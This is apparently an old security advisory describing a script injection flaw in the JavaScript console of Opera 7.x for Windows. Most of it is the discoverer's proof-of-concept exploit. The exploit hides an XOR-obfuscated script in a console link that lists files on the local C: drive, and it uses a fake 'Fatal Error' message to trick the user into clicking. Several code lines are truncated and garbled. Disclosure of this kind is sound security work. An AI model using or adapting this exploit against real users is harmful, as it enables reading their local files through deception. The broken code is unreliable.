Script Injection Vulnerability in Opera for Windows JavaScript Console
A vulnerability in Opera for Windows can result in the execution of an arbitrary script in the Local Computer zone.
April 29, 2003
Reported April 28, 2003, by nesumin.
Opera for Windows 7.10 (build 2840), 7.03 (build 2670), 7.02 (build 2668), 7.02 bork (build 2656b), 7.01 (build 2651)
<span style="font-family:Verdana">A vulnerability in Opera for Windows can result in the execution of an arbitrary script in the Local Computer zone. This vulnerability is a result of code in Opera 7.x's console.html file that doesn't sanitize the single quotation mark. The flaw permits a malicious intruder to inject an arbitrary script into the link on the Microsoft JavaScript console.</span>
<span style="font-family:Verdana"> </span>
The discoverer posted the following code as proof of concept:
This code generates a link on the JavaScript console
to read directory list from local disk "C:" and display it.
[1] replace the "script" instead of "Xploit" and save as html file
[2] upload to WEB server
[3] open with Opera(enable javascript)
[4] click a link on the JavaScript console
var depth = 1;
var startdir = "file://localhost/c:/";
// arbitrary script
var evil_script="";
evil_script += "function dt(dp){";
evil_script += "var i,j,tr,td,b;";
evil_script += "if('complete'fr.document.readyState&&";
evil_script += "fr.document.getElementsByTagName('base').item(0)){";
evil_script += "tr=fr.document.getElementsByTagName('tr');b='
evil_script += "+fr.document.getElementsByTagName('base').item(0).href;";
evil_script += "b+='
'+'Count : '+tr.length+'
evil_script += "for(i=1;i
evil_script += "td = tr.item(i).getElementsByTagName('td');";
evil_script += "if (td.item(0).innerText.match(/^\.\.?$/))continue;";
evil_script += "if(dp>0 && td.item(0).getElementsByTagName('img')";
evil_script += ".item(0).src.match(/\\folder\.gif$/))";
evil_script += "ds.push(td.item(0).getElementsByTagName('a').item(0).href);";
evil_script += "for (j=0;j
evil_script += "b+='
evil_script += "if (0>=ds.length)return;fr.location.href=ds.pop();--dp;}";
evil_script += "setTimeout('dt('+dp+');',30);}var ds = new Array(),";
evil_script += "b = document.getElementsByTagName('body').item(0),";
evil_script += "f = document.createElement('iframe'),";
evil_script += "d = document.createElement('div');";
evil_script += "d.setAttribute('id','tree');b.appendChild(d);";
evil_script += ";";
evil_script += "f.setAttribute('src','"+startdir+"');";
evil_script += "f.setAttribute('id','fr');";
evil_script += "b.appendChild(f);";
evil_script += "dt("+depth+");";
// xor and URLEncode
evil_script = escape(evil_script.replace(/./g,function(s){
var msg = "http://";
// fake url
msg += "";
// code
msg += "');m='";
msg += evil_script;
msg += "';eval(unescape(m).replace(/./g,function(s){";
msg += "return(String.fromCharCode(0x80^s.charCodeAt(0)))})+'";
// fake message
msg += "";
msg += "Fatal Error !!!!";
msg += " Please click above link."; // :p
location.href = "file://localhost/console.html";
<span style="font-family:Verdana"><a href="" style="color: blue; text-decoration: underline; text-underline: single">Opera</a> has yet to respond to this problem.</span>
Discovered bynesumin.
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